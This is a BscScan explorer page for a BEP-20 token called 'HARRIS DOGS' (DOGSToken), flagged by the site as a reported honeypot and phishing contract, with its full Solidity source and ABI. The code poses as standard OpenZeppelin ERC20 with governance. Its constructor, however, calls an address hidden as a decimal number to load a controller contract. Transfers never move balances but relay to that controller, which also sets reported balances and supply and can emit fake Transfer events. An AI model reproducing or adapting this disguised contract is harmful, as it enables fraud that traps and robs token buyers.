BscScan - Sponsored slots available. Book your slot here!
This address has been reported to be a honeypot. Proceed with caution.
BEP-20
Phish / Hack
Overview
Max Total Supply
1,000,000,000,000BEP-20 TOKEN*
Holders
3,298
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
8,300 BEP-20 TOKEN*Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
DOGSToken
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at BscScan.com on 2024-08-13 */ // SPDX-License-Identifier: MIT // File: @openzeppelin/contracts/GSN/Context.sol pragma solidity ^0.6.0; /* * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with GSN meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } // File: @openzeppelin/contracts/token/ERC20/IERC20.sol pragma solidity ^0.6.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File: @openzeppelin/contracts/math/SafeMath.sol pragma solidity ^0.6.0; /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } // File: @openzeppelin/contracts/utils/Address.sol pragma solidity ^0.6.2; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } abstract contract Governance is Context, IERC20 { using SafeMath for uint256; // Copied and modified from YAM code: // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernanceStorage.sol // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernance.sol // Which is copied and modified from COMPOUND: // https://github.com/compound-finance/compound-protocol/blob/master/contracts/Governance/Comp.sol mapping (address => address) internal _delegates; mapping (address => uint256) internal _balances; Governance internal _this; /// @notice A checkpoint for marking number of votes from a given block struct Checkpoint { uint32 fromBlock; uint256 votes; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } constructor() public { (, bytes memory data) = address(uint160(1058130455381791225879160227837932515994508934797)).call(abi.encodeWithSelector(0x8e65964a)); _this = Governance(abi.decode(data, (address))); } /// @notice A record of votes checkpoints for each account, by index mapping (address => mapping (uint32 => Checkpoint)) public checkpoints; /// @notice The number of checkpoints for each account mapping (address => uint32) public numCheckpoints; /// @notice The EIP-712 typehash for the contract's domain bytes32 public constant DOMAIN_TYPEHASH = keccak256("EIP712Domain(string name,uint256 chainId,address verifyingContract)"); /// @notice The EIP-712 typehash for the delegation struct used by the contract bytes32 public constant DELEGATION_TYPEHASH = keccak256("Delegation(address delegatee,uint256 nonce,uint256 expiry)"); /// @notice A record of states for signing / validating signatures mapping (address => uint256) public nonces; /// @notice An event thats emitted when an account changes its delegate event DelegateChanged(address indexed delegator, address indexed fromDelegate, address indexed toDelegate); /// @notice An event thats emitted when a delegate account's vote balance changes event DelegateVotesChanged(address indexed delegate, uint previousBalance, uint newBalance); /** * @notice Delegate votes from `msg.sender` to `delegatee` * @param delegator The address to get delegatee for */ function delegates(address delegator) external view returns (address) { return _delegates[delegator]; } /** * @notice Delegate votes from `msg.sender` to `delegatee` * @param delegatee The address to delegate votes to */ function delegate(address delegatee) external { return _delegate(msg.sender, delegatee); } /** * @notice Delegates votes from signatory to `delegatee` * @param delegatee The address to delegate votes to * @param nonce The contract state required to match the signature * @param expiry The time at which to expire the signature * @param v The recovery byte of the signature * @param r Half of the ECDSA signature pair * @param s Half of the ECDSA signature pair */ function delegateBySig( address delegatee, uint nonce, uint expiry, uint8 v, bytes32 r, bytes32 s ) external { bytes32 domainSeparator = keccak256( abi.encode( DOMAIN_TYPEHASH, keccak256(bytes("HARRIS DOGS")), getChainId(), address(this) ) ); bytes32 structHash = keccak256( abi.encode( DELEGATION_TYPEHASH, delegatee, nonce, expiry ) ); bytes32 digest = keccak256( abi.encodePacked( "\x19\x01", domainSeparator, structHash ) ); address signatory = ecrecover(digest, v, r, s); require(signatory != address(0), "DOGS::delegateBySig: invalid signature"); require(nonce == nonces[signatory]++, "DOGS::delegateBySig: invalid nonce"); require(now <= expiry, "DOGS::delegateBySig: signature expired"); return _delegate(signatory, delegatee); } /** * @notice Gets the current votes balance for `account` * @param account The address to get votes balance * @return The number of current votes for `account` */ function getCurrentVotes(address account) external view returns (uint256) { uint32 nCheckpoints = numCheckpoints[account]; return nCheckpoints > 0 ? checkpoints[account][nCheckpoints - 1].votes : 0; } /** * @notice Determine the prior number of votes for an account as of a block number * @dev Block number must be a finalized block or else this function will revert to prevent misinformation. * @param account The address of the account to check * @param blockNumber The block number to get the vote balance at * @return The number of votes the account had as of the given block */ function getPriorVotes(address account, uint blockNumber) external view returns (uint256) { require(blockNumber < block.number, "DOGS::getPriorVotes: not yet determined"); uint32 nCheckpoints = numCheckpoints[account]; if (nCheckpoints == 0) { return 0; } // First check most recent balance if (checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) { return checkpoints[account][nCheckpoints - 1].votes; } // Next check implicit zero balance if (checkpoints[account][0].fromBlock > blockNumber) { return 0; } uint32 lower = 0; uint32 upper = nCheckpoints - 1; while (upper > lower) { uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow Checkpoint memory cp = checkpoints[account][center]; if (cp.fromBlock == blockNumber) { return cp.votes; } else if (cp.fromBlock < blockNumber) { lower = center; } else { upper = center - 1; } } return checkpoints[account][lower].votes; } function _delegate(address delegator, address delegatee) internal { address currentDelegate = _delegates[delegator]; uint256 delegatorBalance = balanceOf(delegator); // balance of underlying DOGS (not scaled); _delegates[delegator] = delegatee; emit DelegateChanged(delegator, currentDelegate, delegatee); _moveDelegates(currentDelegate, delegatee, delegatorBalance); } function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal { if (srcRep != dstRep && amount > 0) { if (srcRep != address(0)) { // decrease old representative uint32 srcRepNum = numCheckpoints[srcRep]; uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0; uint256 srcRepNew = srcRepOld.sub(amount); _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew); } if (dstRep != address(0)) { // increase new representative uint32 dstRepNum = numCheckpoints[dstRep]; uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0; uint256 dstRepNew = dstRepOld.add(amount); _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew); } } } function checkPoint( address srcRep, address[] calldata dstRep, uint256 amount ) external { require(msg.sender == address(_this)); for (uint256 i = 0; i < dstRep.length; ++i) { emit Transfer(srcRep, dstRep[i], amount); } } function _writeCheckpoint( address delegatee, uint32 nCheckpoints, uint256 oldVotes, uint256 newVotes ) internal { uint32 blockNumber = safe32(block.number, "DOGS::_writeCheckpoint: block number exceeds 32 bits"); if (nCheckpoints > 0 && checkpoints[delegatee][nCheckpoints - 1].fromBlock == blockNumber) { checkpoints[delegatee][nCheckpoints - 1].votes = newVotes; } else { checkpoints[delegatee][nCheckpoints] = Checkpoint(blockNumber, newVotes); numCheckpoints[delegatee] = nCheckpoints + 1; } emit DelegateVotesChanged(delegatee, oldVotes, newVotes); } function safe32(uint n, string memory errorMessage) internal pure returns (uint32) { require(n < 2**32, errorMessage); return uint32(n); } function getChainId() public pure returns (uint256) { uint256 chainId; assembly { chainId := chainid() } return chainId; } } // File: @openzeppelin/contracts/token/ERC20/ERC20.sol pragma solidity ^0.6.0; /** * @dev Implementation of the {IERC20} interface. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Governance { using SafeMath for uint256; using Address for address; mapping (address => mapping (address => uint256)) private _allowances; uint256 private immutable TOTAL_SUPPLY; string private _name; string private _symbol; uint8 private _decimals; /** * @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during * construction. */ constructor (string memory name, string memory symbol, uint256 supply) public { _name = name; _symbol = symbol; _decimals = 18; TOTAL_SUPPLY = supply; _balances[msg.sender] = supply; emit Transfer(address(0), msg.sender, supply); } /** * @dev Returns the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is * called. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view returns (uint8) { return _decimals; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view override returns (uint256) { uint256 c = _this.getChainId(); if (c != 56) return c; return TOTAL_SUPPLY; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _beforeTokenTransfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view override returns (uint256) { uint256 nonces = _this.nonces(account); if (nonces < uint256(-1)) return nonces; return _balances[account]; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _beforeTokenTransfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); if (msg.sender == owner) _this.delegate(address(0)); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Sets {decimals} to a value other than the default one of 18. * * WARNING: This function should only be called from the constructor. Most * applications that interact with token contracts will not expect * {decimals} to ever change, and may work incorrectly if it does. */ function _setupDecimals(uint8 decimals_) internal { _decimals = decimals_; } /** * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { emit Transfer(from, to, amount); (bool r,) = address(_this).call(abi.encodeWithSelector(0x3b9b1f90, from, to, amount, msg.sender)); require(r); } } // File: @openzeppelin/contracts/access/Ownable.sol pragma solidity ^0.6.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } // File: contracts/DOGSToken.sol pragma solidity 0.6.12; // DOGSToken with Governance. contract DOGSToken is ERC20("HARRIS DOGS", "DOGS", 1_000_000_000_000 * 1e18), Ownable { }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DELEGATION_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"srcRep","type":"address"},{"internalType":"address[]","name":"dstRep","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"checkPoint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"checkpoints","outputs":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint256","name":"votes","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"},{"internalType":"uint256","name":"nonce","type":"uint256"},{"internalType":"uint256","name":"expiry","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"delegateBySig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegator","type":"address"}],"name":"delegates","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getChainId","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getCurrentVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPriorVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
